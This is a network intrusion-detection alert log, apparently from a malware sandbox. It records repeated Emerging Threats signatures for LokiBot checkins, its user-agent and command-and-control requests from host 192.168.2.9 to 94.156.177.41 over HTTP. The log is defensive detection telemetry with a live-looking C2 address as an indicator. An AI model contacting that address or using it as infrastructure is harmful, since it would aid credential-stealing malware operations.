2025-01-11T08:38:07.543493+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-11T08:38:07.543493+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-11T08:38:07.543493+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-11T08:38:08.253891+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-11T08:38:08.535138+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-11T08:38:08.535138+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-11T08:38:08.535138+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-11T08:38:09.255787+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-11T08:38:09.430836+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-11T08:38:09.430836+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-11T08:38:09.430836+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-11T08:38:10.138394+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-11T08:38:10.296978+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-11T08:38:10.296978+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-11T08:38:10.296978+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-11T08:38:11.003703+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-11T08:38:11.151744+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-11T08:38:11.151744+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-11T08:38:11.151744+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-11T08:38:11.883164+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-11T08:38:12.040089+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-11T08:38:12.040089+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-11T08:38:12.040089+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-11T08:38:12.778136+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-11T08:38:12.949663+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-11T08:38:12.949663+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-11T08:38:12.949663+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-11T08:38:13.686751+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-11T08:38:13.842179+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-11T08:38:13.842179+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-11T08:38:13.842179+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-11T08:38:14.556486+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-11T08:38:14.714006+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-11T08:38:14.714006+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-11T08:38:14.714006+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-11T08:38:15.572731+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-11T08:38:15.727832+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-11T08:38:15.727832+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-11T08:38:15.727832+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-11T08:38:16.449634+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-11T08:38:16.602139+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-11T08:38:16.602139+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-11T08:38:16.602139+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-11T08:38:17.326715+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-11T08:38:17.480431+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-11T08:38:17.480431+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-11T08:38:17.480431+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-11T08:38:18.200103+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-11T08:38:18.361971+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-11T08:38:18.361971+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-11T08:38:18.361971+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-11T08:38:19.084044+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-11T08:38:19.243600+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-11T08:38:19.243600+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-11T08:38:19.243600+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-11T08:38:19.943174+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-11T08:38:20.125882+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-11T08:38:20.125882+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-11T08:38:20.125882+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-11T08:38:20.836464+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-11T08:38:21.374944+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-11T08:38:21.374944+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-11T08:38:21.374944+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-11T08:38:22.072417+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-11T08:38:22.229791+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-11T08:38:22.229791+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-11T08:38:22.229791+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-11T08:38:22.938811+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-11T08:38:23.088593+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-11T08:38:23.088593+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-11T08:38:23.088593+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-11T08:38:23.775451+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-11T08:38:24.220880+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-11T08:38:24.220880+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-11T08:38:24.220880+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-11T08:38:24.924940+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-11T08:38:25.073323+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-11T08:38:25.073323+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-11T08:38:25.073323+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-11T08:38:25.792727+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-11T08:38:25.957719+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-11T08:38:25.957719+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-11T08:38:25.957719+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-11T08:38:26.667801+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-11T08:38:26.972510+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-11T08:38:26.972510+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-11T08:38:26.972510+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-11T08:38:27.819161+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-11T08:38:27.976208+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-11T08:38:27.976208+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-11T08:38:27.976208+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-11T08:38:28.682413+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-11T08:38:28.837379+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-11T08:38:28.837379+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-11T08:38:28.837379+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-11T08:38:29.679562+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-11T08:38:29.840822+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-11T08:38:29.840822+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-11T08:38:29.840822+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-11T08:38:30.528984+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-11T08:38:30.693073+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-11T08:38:30.693073+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-11T08:38:30.693073+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-11T08:38:31.418232+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-11T08:38:31.577126+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-11T08:38:31.577126+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-11T08:38:31.577126+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-11T08:38:32.294702+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-11T08:38:32.460501+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-11T08:38:32.460501+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-11T08:38:32.460501+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-11T08:38:33.203940+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-11T08:38:33.646503+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-11T08:38:33.646503+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-11T08:38:33.646503+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-11T08:38:34.375337+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-11T08:38:34.530472+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-11T08:38:34.530472+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-11T08:38:34.530472+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-11T08:38:35.360232+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-11T08:38:35.510279+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-11T08:38:35.510279+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-11T08:38:35.510279+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-11T08:38:36.209960+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-11T08:38:36.471295+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-11T08:38:36.471295+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-11T08:38:36.471295+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-11T08:38:37.179276+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-11T08:38:37.336378+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-11T08:38:37.336378+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-11T08:38:37.336378+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-11T08:38:38.042783+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-11T08:38:38.202393+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-11T08:38:38.202393+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-11T08:38:38.202393+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-11T08:38:38.912153+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-11T08:38:39.238877+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-11T08:38:39.238877+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-11T08:38:39.238877+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-11T08:38:39.956976+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-11T08:38:40.130128+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-11T08:38:40.130128+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-11T08:38:40.130128+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-11T08:38:40.858919+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-11T08:38:41.012348+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-11T08:38:41.012348+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-11T08:38:41.012348+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-11T08:38:41.746972+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-11T08:38:41.968094+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-11T08:38:41.968094+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-11T08:38:41.968094+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-11T08:38:42.661261+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-11T08:38:42.823353+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-11T08:38:42.823353+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-11T08:38:42.823353+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-11T08:38:43.538124+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-11T08:38:43.698121+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-11T08:38:43.698121+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-11T08:38:43.698121+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-11T08:38:44.418883+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-11T08:38:44.595801+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-11T08:38:44.595801+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-11T08:38:44.595801+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-11T08:38:45.460503+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-11T08:38:45.627870+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-11T08:38:45.627870+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-11T08:38:45.627870+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-11T08:38:46.349034+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-11T08:38:46.516711+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-11T08:38:46.516711+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-11T08:38:46.516711+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-11T08:38:47.254357+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-11T08:38:47.424671+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-11T08:38:47.424671+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-11T08:38:47.424671+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-11T08:38:48.123391+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-11T08:38:48.273476+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-11T08:38:48.273476+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-11T08:38:48.273476+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-11T08:38:48.972039+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-11T08:38:49.116902+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-11T08:38:49.116902+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-11T08:38:49.116902+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-11T08:38:49.816159+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-11T08:38:49.960016+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-11T08:38:49.960016+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-11T08:38:49.960016+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-11T08:38:50.672196+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-11T08:38:50.825321+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-11T08:38:50.825321+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-11T08:38:50.825321+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-11T08:38:51.546237+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-11T08:38:51.695758+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50083	94.156.177.41	80	TCP
2025-01-11T08:38:51.695758+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50083	94.156.177.41	80	TCP
2025-01-11T08:38:51.695758+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50083	94.156.177.41	80	TCP
2025-01-11T08:38:52.407655+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50083	94.156.177.41	80	TCP
2025-01-11T08:38:52.555444+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50084	94.156.177.41	80	TCP
2025-01-11T08:38:52.555444+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50084	94.156.177.41	80	TCP
2025-01-11T08:38:52.555444+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50084	94.156.177.41	80	TCP
2025-01-11T08:38:53.255014+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50084	94.156.177.41	80	TCP
2025-01-11T08:38:53.414347+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50085	94.156.177.41	80	TCP
2025-01-11T08:38:53.414347+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50085	94.156.177.41	80	TCP
2025-01-11T08:38:53.414347+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50085	94.156.177.41	80	TCP
2025-01-11T08:38:54.122050+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50085	94.156.177.41	80	TCP
